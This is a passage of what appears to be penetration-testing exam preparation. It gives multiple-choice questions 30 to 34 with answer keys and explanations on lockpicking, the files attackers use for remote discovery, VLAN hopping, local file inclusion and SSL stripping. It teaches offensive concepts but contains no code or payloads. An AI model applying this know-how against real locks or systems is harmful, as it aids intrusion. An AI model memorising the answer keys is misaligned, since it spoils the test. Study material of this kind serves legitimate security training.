A, C, and D are incorrect. A is incorrect because while SNMPv3 now requires a username and password, the protocol standard does not require multifactor authentication. C is incorrect because no change was made to the community or private strings; in addition, such a change would make no net difference in security, as attackers would simply add the new community string value to their existing wordlists. D is incorrect and would effectively negate the entire purposes of SNMP; if sending notifications required manual intervention, it would no longer be an automated means of network monitoring.

Question 30

A methodical approach to defeating a lock, which technique relies on interacting with a lock and its pins in series, addressing them in the order in which they bind the most when pressure is applied with a torque wrench?
A.Bumping
B.Double ball
C.Tailgating
D.Single pin picking

Answer 30

D.Single pin picking

Explanation:
Single pin picking is a slower, more methodical approach to lockpicking that can produce great results, but is costly in terms of time required and the potential for exposure. Put simply, a lock is probed with a pick while tension is applied with a torque wrench; the pin that binds the most is lifted into a set position while the plug is rotated further, locking the driver pin in place. At this point, another pin begins to bind, making it the new target. This process repeats until all pins are set and the plug completes its turn, unlocking the lock.

A, B, and C are incorrect. A is incorrect because “bumping” is a lock-picking technique that relies on the use of specially made “bump keys” and a tool called a bump hammer, which is used to “bump” the bump key while attempting to turn the plug; conventional wisdom considers it faster than single pin picking, but louder. B is incorrect because a double ball is a specific type of pick, rather than a picking technique. Ball and double ball picks are meant to be used when picking locks that use wafers as the main binding mechanism, rather than pins. This typically includes desks, file cabinets, and even some glove boxes in cars. C is incorrect because tailgating is used to gain access to a facility after an authorized individual has legitimately opened an access point, rather than a direct attempt to defeat a security mechanism. Basic courtesies are in these situations a security flaw: people are too quick to hold a door open for a co-worker, or even someone who simply appears to belong where they are, in spite of the fact that security policies will typically dictate that employees must swipe their access badges every time they enter a controlled area.

Question 31

Which of the following files would not be a target of interest for remote system discovery per MITRE’s ATT&CK framework?
A. /etc/hosts
B./etc/passwd
C.~/.bash_history
D.C:\Windows\System32\Drivers\etc\hosts

Answer 31

B./etc/passwd

Explanation:
While still useful for local enumeration of user and system accounts, the /etc/passwd file is the least likely choice to contain any information regarding remote systems, servers, or networks. Since the question asked which file would not be of interest for remote system discovery, B is the correct answer.

A, C, and D are incorrect. All of the files listed in these choices contain information that could be of value in the enumeration of additional remote systems. A and D are incorrect because system hosts files (/etc/hosts and C:\Windows\System32\Drivers\etc\hosts in *nix and Windows operating system families, respectively) serve to map hostnames to IP addresses. Since one of the functions provided by the hosts file is name resolution, it is frequently used to eliminate the need for a name lookup for other services and functions for target systems with which the initial host regularly interacts. This makes hosts files a particularly valuable source of information for remote systems that are commonly accessed by users or services on a given host, and further makes both of these choices incorrect answers. C is incorrect because ~/.bash_history contains all of the commands entered by a user within their bash sessions. If the user connects to remote servers via SSH, SFTP, or other protocols, this information would be collected in the history file, which can then inform a penetration tester of other likely targets for attack or lateral movement. Since this can directly reveal remote systems, it is an incorrect answer.

Question 32

Which of the following are methods of VLAN hopping? (Choose two.)
A.MAC Flapping
B.Double Tagging
C.NAC ByPass
D.Switch spoofing

Answer 32

B.Double Tagging
D.Switch spoofing

Explanation:
B is correct because double tagging is a VLAN hopping method wherein traffic is tagged as belonging to an unauthorized, target VLAN in addition to the originating VLAN. The traffic is then forwarded to the intended target by the next switch as if it originated from the unauthorized VLAN. This technique can be mitigated by ensuring that devices are not left on the default VLAN (VLAN 1), changing the native VLAN on all trunk ports to an otherwise unused VLAN, and by requiring explicit tagging of the native VLAN on all trunk ports. D is correct because switch spoofing is a VLAN hopping technique wherein one masquerades as a trunking switch by using the VLAN tagging and trunking protocols found in IEEE 802.1Q (Dynamic Trunking Protocol). By communicating via those protocols over the network, the attacking system can gain access to other different VLANs. This technique requires that the Dynamic Trunking Protocol (DTP) is enabled on the switch, and can be further mitigated by explicitly declaring ports not intended for trunking traffic to be designated as access ports only.

A and C are incorrect. A is incorrect because MAC flapping occurs when multiple hosts on a switch are claiming the same MAC address; this can occur as part of a network-based attack on a system or subnet. C is incorrect because NAC (Network Access Control) bypasses are a broad category of network-based attack; VLAN hopping is itself an example of a NAC bypass.

Question 33

Which class of vulnerability occurs when an attacker is able to exploit an improperly configured file inclusion mechanism in a target application in such a way that a web application handles an otherwise inaccessible file, such as the system hosts file or /etc/passwd file in *nix systems?
A.Remote file inclusion
B.HTML injection
C.Reflected XSS
D.Local file inclusion

Answer 33

D.Local file inclusion

Explanation:
The attack described is local file inclusion (LFI). LFI vulnerabilities are best mitigated through the used of “jail directories” that prevent a running web service or application from traversing the entirety of a host’s operating system, and they are best mitigated by properly sanitizing user input and/or by whitelisting files or file types acceptable for inclusion.

A, B, and C are incorrect. A is incorrect because remote file inclusion would require that the web server load a resource hosted on an external system, rather than a file stored on the local system, as described in the scenario. B is incorrect because HTML injection would show through the addition of malicious HTML to a web server that would then be executed in a visiting victim’s web browser. The attack described instead attacks the server directly in order to achieve disclosure of information or files on the target server that would otherwise be inaccessible, making this answer incorrect. C is incorrect because reflected XSS attacks would require that a user be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim without storing it locally. The attack described in the question does not target a visiting user’s browser but rather information stored on the web server itself. Moreover, it does not require that a legitimate user click a malicious link, making this answer incorrect.

Question 34

Which of the following is the best potential use for SSL stripping in a penetration test?
A.Interception of usernames and passwords
B.Tricking a user into connecting to a malicious site rather than their intended destination in order to infect them with malware
C.Cracking the pre-shared key in use on their corporate wireless network
D.Theft of user session cookies

Answer 34

A.Interception of usernames and passwords

Explanation:
SSL stripping is performed as part of a man-in-the-middle attack, and effectively results in victims connecting to target websites over HTTP, rather than HTTPS. The lack of SSL means that usernames, passwords, and other sensitive information will be transmitted in plaintext, which can then be sniffed as they travel over the network.

B, C, and D are incorrect. B is incorrect because redirecting a user to a (usually malicious) site they did not want to visit is typical of DNS cache poisoning or a watering hole attack. C is incorrect because cracking a pre-shared key is typically the goal of intercepting four-way handshakes in WPA and WPA2 networks. D is incorrect because while theft of user sessions would be possible by intercepting response authenticated traffic between a target and a site to which the user is authenticated, that session would become invalidated once the user logged out. Interception of usernames and passwords would enable an attacker to log in freely without relying on the user’s session, making it a more effective use of traffic interception, and making session theft an incorrect answer.